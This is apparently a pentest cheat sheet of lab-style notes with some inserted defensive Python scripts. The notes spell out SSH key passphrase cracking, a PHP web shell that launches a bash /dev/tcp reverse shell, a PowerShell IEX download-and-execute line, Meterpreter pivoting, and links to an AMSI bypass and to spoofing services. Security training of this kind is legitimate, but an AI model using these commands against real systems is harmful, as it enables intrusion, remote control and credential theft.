tcpdump -i tun0 icmp (for protocol filter)
Category: Pentest
Stego (steganography)
Look at picture for content
- binwalk file.png
Extract files from image
- binwalk -Me file.png
SSH
Use SSH private key (key.priv)
chmod 600 key.priv
ssh -i key.priv user@x.x.x.x
Crack the passphrase of an encrypted id_rsa key
python /usr/share/john/ssh2john.py id_rsa > test
john --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test
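Before running ssh2john it is worth checking whether the key is passphrase-protected at all: ssh2john only produces a crackable hash for encrypted keys, and from the defending side an unencrypted private key lying around is the finding to flag, since it needs no cracking. The following check is an added example, not code from these notes or from the john/ssh2john projects. It reads the two on-disk formats OpenSSH writes: legacy PEM, where encryption is signalled by a Proc-Type: 4,ENCRYPTED header, and the openssh-key-v1 format, where the base64 blob starts with the magic string followed by the ciphername and kdfname strings (both "none" for an unprotected key). The sample keys are constructed and contain no real key material.

```python
import base64
import struct

# Constructed sample keys: no real key material, only the headers that the
# check looks at. Bodies are placeholders.
PEM_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

PLACEHOLDERBODY
-----END RSA PRIVATE KEY-----
"""

PEM_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
PLACEHOLDERBODY
-----END RSA PRIVATE KEY-----
"""

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(blob: bytes, offset: int):
    """Inverse of _ssh_string; returns (value, new_offset) or raises ValueError."""
    if offset + 4 > len(blob):
        raise ValueError("truncated length field")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    offset += 4
    if offset + length > len(blob):
        raise ValueError("truncated string")
    return blob[offset:offset + length], offset + length


def build_openssh_key(cipher: str, kdf: str) -> str:
    """Constructed OpenSSH-format key prefix (magic, ciphername, kdfname only)."""
    blob = OPENSSH_MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
    body = base64.b64encode(blob).decode("ascii")
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def key_protection(text: str) -> str:
    """Classify a private key file as 'encrypted', 'unencrypted' or 'unknown'."""
    lines = [l.strip() for l in text.strip().splitlines() if l.strip()]
    if not lines:
        return "unknown"
    header = lines[0]

    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # New format: base64 blob = magic || string ciphername || string kdfname || ...
        body = "".join(l for l in lines[1:] if not l.startswith("-----"))
        try:
            blob = base64.b64decode(body, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            return "unknown"
        if not blob.startswith(OPENSSH_MAGIC):
            return "unknown"
        try:
            cipher, off = _read_ssh_string(blob, len(OPENSSH_MAGIC))
            kdf, _ = _read_ssh_string(blob, off)
        except ValueError:
            return "unknown"
        return "unencrypted" if cipher == b"none" and kdf == b"none" else "encrypted"

    if header == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return "encrypted"  # PKCS#8 encrypted container

    if header.startswith("-----BEGIN ") and header.endswith(" PRIVATE KEY-----"):
        # Legacy PEM (RSA/DSA/EC): encrypted only if a Proc-Type header says so
        if any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines[1:]):
            return "encrypted"
        return "unencrypted"

    return "unknown"


def find_unprotected(keys: dict) -> list:
    """Names of keys that carry no passphrase: the ones to flag in an audit."""
    return [name for name, text in keys.items() if key_protection(text) == "unencrypted"]


if __name__ == "__main__":
    sample = {
        "id_rsa.pem-enc": PEM_ENCRYPTED,
        "id_rsa.pem-plain": PEM_PLAIN,
        "id_ed25519.plain": build_openssh_key("none", "none"),
        "id_ed25519.enc": build_openssh_key("aes256-ctr", "bcrypt"),
    }
    for name, text in sample.items():
        print(f"{name}: {key_protection(text)}")
    print("unprotected:", find_unprotected(sample))
```

The openssh-key-v1 branch only reads the first two strings after the magic, which is all the classification needs; a key that reports "unencrypted" is usable as-is and is the one to rotate, while an "encrypted" one is the only case where the ssh2john step above applies.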
Interesting Sites
Recon / Enumeration
http://www.lifeoverpentest.com/
https://backdoorshell.gitbooks.io/oscp-useful-links/
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.thegeekstuff.com/2010/07/execute-shell-script/
https://hashes.org/
https://github.com/blackploit/hash-identifier.git
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
https://github.com/rasta-mouse?tab=repositories
https://iwantmore.pizza/posts/amsi.html
https://github.com/d0nkeys/redteam/tree/master/code-execution
https://github.com/d0nkeys/redteam
Working AMSI Bypass
https://github.com/aloksaurabh/OffenPowerSh/blob/master/Bypass/Invoke-AmsiBypass.ps1
Exploits
https://nvd.nist.gov/vuln/search
https://www.exploit-db.com/
https://packetstormsecurity.com/
https://www.securityfocus.com/vulnerabilities
https://0day.tday
http://mvfjfugdwgc5uwho.onion/
Social engineering
https://www.spoofmytextmessage.com/
https://www.spoofmyemail.com/
https://goo.gl tinyurl.com
Python
SimpleHTTPServer
- python -m SimpleHTTPServer 4343 (default 8000)
SHELL
- python -c 'import pty;pty.spawn("/bin/bash")'
- stty raw -echo // now press Enter once, type fg, then press Enter twice
*check rows & columns with stty -a, then set them: stty rows 34 cols 136
export TERM=xterm
Powershell
Encode BASE64
- cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
- nc -lvnp 9001 (listener)
- $username = 'username'
- $password = 'password'
- $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
- $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
- Enter-PSSession -ComputerName x.x.x.x -Port 5985 -Credential $credential
*powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/exploit.html')"
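The iconv -t UTF-16LE | base64 -w0 pipeline above is exactly what powershell.exe -EncodedCommand expects, and it is also what shows up in process-creation logs when such a one-liner runs, so the same transformation run backwards is the bread-and-butter triage step on the detection side. The script below is an added example, not part of these notes: it encodes the way the pipeline does, decodes what it finds in a log line (powershell.exe accepts any unambiguous prefix of -EncodedCommand, so -e, -enc and the full name are all matched), and tags the decoded script with a few download-and-execute indicators. The log lines and the indicator list are constructed for the example; the "whoami" blob is the real encoding of that string.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match every prefix of the flag name, longest first.
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:" + _PREFIXES + r")\s+([A-Za-z0-9+/]+={0,2})")

# Constructed indicator list: strings typical of download-and-execute one-liners
# such as the IEX/DownloadString line in the notes above.
INDICATORS = ("downloadstring", "iex", "invoke-expression", "net.webclient", "frombase64string")


def encode_command(script: str) -> str:
    """Same transformation as `iconv -t UTF-16LE | base64 -w0`."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Reverse it: base64 -> bytes -> UTF-16LE text. Raises ValueError on bad input."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def decode_log_line(line: str):
    """Return the decoded script if the line carries an encoded command, else None."""
    m = ENC_RE.search(line)
    if not m:
        return None
    try:
        return decode_command(m.group(1))
    except (ValueError, UnicodeDecodeError):  # not base64, or odd byte count
        return None


def scan_log(lines):
    """Return (decoded_script, matched_indicators) for every line with an encoded command."""
    findings = []
    for line in lines:
        decoded = decode_log_line(line)
        if decoded is None:
            continue
        lowered = decoded.lower()
        findings.append((decoded, [i for i in INDICATORS if i in lowered]))
    return findings


# Constructed sample process-creation log lines (not from a real system).
# The -w0 in the encoding pipeline is what keeps the blob on one line.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z host1 4688 powershell.exe -nop -w hidden -EncodedCommand dwBoAG8AYQBtAGkA",
    "2024-01-01T10:00:05Z host1 4688 powershell -nop -enc "
    + encode_command("IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/exploit.html')"),
    "2024-01-01T10:00:09Z host1 4688 powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]


if __name__ == "__main__":
    for script, hits in scan_log(SAMPLE_LOG):
        flag = "SUSPICIOUS" if hits else "info"
        print(f"[{flag}] {script!r} hits={hits}")
```

Only the first two sample lines decode; the -ExecutionPolicy line is left alone because "ex" is not a prefix of EncodedCommand. Decoding is deliberately separate from scoring so the decoded text can be fed to whatever rule set is in use.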
Port Knocking
Check for port knock services
- /etc/init.d$ ls
- less knockd
Check config file
- /etc/default/knockd
Run tcp packet on required ports
*for i in 571 290 911; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 x.x.x.x; done
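From the defending side the question once the config file has been located is whether the knock sequence is actually worth anything, since knockd only gates a port as well as the sequence is hard to hit by accident or by scanning. The audit script below is an added example, not part of these notes or of the knockd project: it parses the INI-style knockd.conf layout documented in the knockd man page (sections with sequence, seq_timeout, command and tcpflags keys; ports written as port or port:udp, TCP by default) and flags sequences that are short, open for too long, or that count any TCP packet because tcpflags is unset. The sample config and the thresholds are constructed for the example.

```python
# Constructed knockd.conf in the layout documented by the knockd man page;
# section names, ports and commands are made up for this example.
SAMPLE_CONF = """
[options]
    UseSyslog
    interface = eth0

[openSSH]
    sequence    = 7000,8000,9000
    seq_timeout = 5
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[weakAdmin]
    sequence    = 1234:udp,1235
    seq_timeout = 60
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 8080 -j ACCEPT
"""


def parse_knockd(text: str) -> dict:
    """Return {section: {key: value}}; bare flags such as UseSyslog map to True."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
            continue
        if current is None:
            continue  # stray line before any section header
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
        else:
            key, value = line, True
        sections[current][key.lower()] = value
    return sections


def parse_sequence(value: str) -> list:
    """'7000:udp,8000' -> [(7000, 'udp'), (8000, 'tcp')]; knockd defaults to tcp."""
    seq = []
    for item in value.split(","):
        port, _, proto = item.strip().partition(":")
        seq.append((int(port), (proto or "tcp").lower()))
    return seq


def audit_knockd(text: str, min_ports: int = 3, max_timeout: int = 10) -> list:
    """Return (section, problem) pairs for knock sequences that are easy to trigger."""
    findings = []
    for name, opts in parse_knockd(text).items():
        if name == "options" or "sequence" not in opts:
            continue
        seq = parse_sequence(opts["sequence"])
        if len(seq) < min_ports:
            findings.append((name, f"only {len(seq)} port(s) in sequence"))
        timeout = int(opts.get("seq_timeout", 0))
        if timeout > max_timeout:
            findings.append((name, f"seq_timeout of {timeout}s is a wide window"))
        if any(proto == "tcp" for _, proto in seq) and "tcpflags" not in opts:
            findings.append((name, "no tcpflags set, any TCP packet to the port counts as a knock"))
    return findings


if __name__ == "__main__":
    for section, problem in audit_knockd(SAMPLE_CONF):
        print(f"[{section}] {problem}")
```

The three thresholds are arbitrary starting points; what matters is that a two-port sequence with a 60-second window is something a routine port scan can trip, while the openSSH/closeSSH pair in the sample passes all three checks.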
PHP
Upload php code exec script
- File.php =
- In url
- http://x.x.x.x/File.php?msx=whoami
https://www.acunetix.com/websitesecurity/php-security-2/
PHP shell
in url go to shell.php?command=whoami
In Burpsuite create post request
POST /url/shell.php HTTP/1.1 with body: command=bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'
URL encode it to command=bash+-c+'bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261'
Setup NC to listen for incoming connections: nc -lvnp 4444
Nessus
/etc/init.d/nessusd start https://127.0.0.1:8834
Metasploit tips
systemctl start postgresql
cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/
updatedb
sessions -u (upgrade a shell session to Meterpreter)
- search delivery for web payload deliver
- search autoroute for session routes
- search smb_version
- search arp_sweep
Vulnerability Scanning in Metasploit
db_nmap -v --script vuln 192.168.0.184
- hosts
- services
Port forwarding
portfwd add -l 3389 -p 3389 -r target-host
Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell